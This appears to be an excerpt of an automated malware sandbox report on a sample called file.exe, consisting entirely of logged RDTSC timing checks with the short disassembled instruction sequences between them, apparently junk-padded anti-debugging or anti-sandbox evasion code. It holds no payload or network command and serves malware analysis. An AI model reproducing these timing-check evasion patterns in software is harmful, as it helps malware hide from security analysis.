                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1146 second address: FF1150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1F50F77976h 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1150 second address: FF1154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1154 second address: FF115A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF12C3 second address: FF12CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF12CF second address: FF12D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF12D3 second address: FF12D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1732 second address: FF173A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF173A second address: FF1747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F1F50CBBC36h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1C58 second address: FF1C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1C5E second address: FF1C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1D98 second address: FF1DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1DA1 second address: FF1DA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF200E second address: FF201A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0E62 second address: FF0E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1F50CBBC36h 0x0000000a jmp 00007F1F50CBBC42h 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jnl 00007F1F50CBBC36h 0x0000001a jng 00007F1F50CBBC36h 0x00000020 jo 00007F1F50CBBC36h 0x00000026 popad 0x00000027 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0E96 second address: FF0EA0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1F50F77982h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FA46 second address: F5FA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1F50CBBC36h 0x0000000a popad 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FA51 second address: F5FA5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F1F50F77976h 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FA5B second address: F5FA5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF4BCC second address: FF4BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF4BD0 second address: FF4BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F1F50CBBC3Bh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF4BF0 second address: FF4BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF4BF4 second address: FF4C1C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1F50CBBC36h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jng 00007F1F50CBBC36h 0x00000013 jmp 00007F1F50CBBC41h 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF786C second address: FF7872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7872 second address: FF787D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF787D second address: FF7882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7882 second address: FF78AB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1F50CBBC3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1F50CBBC47h 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7A1F second address: FF7A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD1BF second address: FFD1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD431 second address: FFD437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD437 second address: FFD468 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1F50CBBC40h 0x0000000d jmp 00007F1F50CBBC49h 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD468 second address: FFD49A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1F50F77982h 0x0000000c jp 00007F1F50F77976h 0x00000012 jo 00007F1F50F77976h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD49A second address: FFD4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50CBBC3Ch 0x00000009 popad 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD4AB second address: FFD4B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD4B1 second address: FFD4B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDAC0 second address: FFDAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100228F second address: 100229E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jnl 00007F1F50CBBC38h 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100229E second address: 10022A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10022A4 second address: 10022AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001AAD second address: 1001ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001FFD second address: 1002008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10056E9 second address: 10056ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10056ED second address: 10056F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1005BC5 second address: 1005BD0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1005BD0 second address: 1005BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1F50CBBC3Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100602C second address: 100604C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1F50F77983h 0x0000000b jng 00007F1F50F77976h 0x00000011 popad 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100CB61 second address: 100CB67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100CB67 second address: 100CB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100D6AE second address: 100D6DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F50CBBC3Bh 0x00000008 jmp 00007F1F50CBBC41h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1F50CBBC3Ah 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100D6DE second address: 100D6E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100D97E second address: 100D982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100DEC7 second address: 100DED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F1F50F77976h 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100DED1 second address: 100DEDB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F50CBBC36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E1F0 second address: 100E1F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E1F4 second address: 100E1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E1FC second address: 100E203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E203 second address: 100E230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50CBBC46h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d js 00007F1F50CBBC36h 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E49A second address: 100E4B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50F77985h 0x00000009 js 00007F1F50F77976h 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012913 second address: 1012919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012919 second address: 101291D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101291D second address: 1012968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F50CBBC3Eh 0x0000000b jnl 00007F1F50CBBC4Fh 0x00000011 pushad 0x00000012 jmp 00007F1F50CBBC43h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1011AD8 second address: 1011AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1011C2E second address: 1011C49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC47h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012015 second address: 101201B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101201B second address: 101201F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101723D second address: 1017241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1017241 second address: 1017255 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F50CBBC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F1F50CBBC7Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1017255 second address: 1017259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1017259 second address: 101725D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F011 second address: 101F017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D20B second address: 101D211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D211 second address: 101D229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F1F50F7797Fh 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D229 second address: 101D22F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D38E second address: 101D399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1F50F77976h 0x0000000a popad 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D399 second address: 101D39E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D7EC second address: 101D809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50F77987h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D95E second address: 101D962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D962 second address: 101D97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50F77986h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D97E second address: 101D998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50CBBC44h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101DD9C second address: 101DDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027A47 second address: 1027A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027BBC second address: 1027BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102A1FB second address: 102A21C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007F1F50CBBC36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F1F50CBBC3Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102A21C second address: 102A222 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036578 second address: 103657E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103657E second address: 1036584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A0B4 second address: 103A0B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103FA59 second address: 103FA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50F77980h 0x00000009 jmp 00007F1F50F77989h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 jc 00007F1F50F7797Eh 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103FA93 second address: 103FAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1F50CBBC38h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1F50CBBC3Bh 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103FAAC second address: 103FABA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1F50F77976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048C50 second address: 1048C5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048C5A second address: 1048C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104B1D6 second address: 104B1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F1F50CBBC36h 0x0000000c popad 0x0000000d jo 00007F1F50CBBC42h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104B1EB second address: 104B1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105273E second address: 1052750 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051089 second address: 1051095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1F50F77976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051497 second address: 10514B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50CBBC49h 0x00000009 pop esi 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10514B5 second address: 10514C1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10514C1 second address: 10514C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051767 second address: 105176D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10518B6 second address: 10518D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F1F50CBBC46h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10518D4 second address: 10518DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10518DD second address: 10518F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50CBBC47h 0x00000009 rdtsc
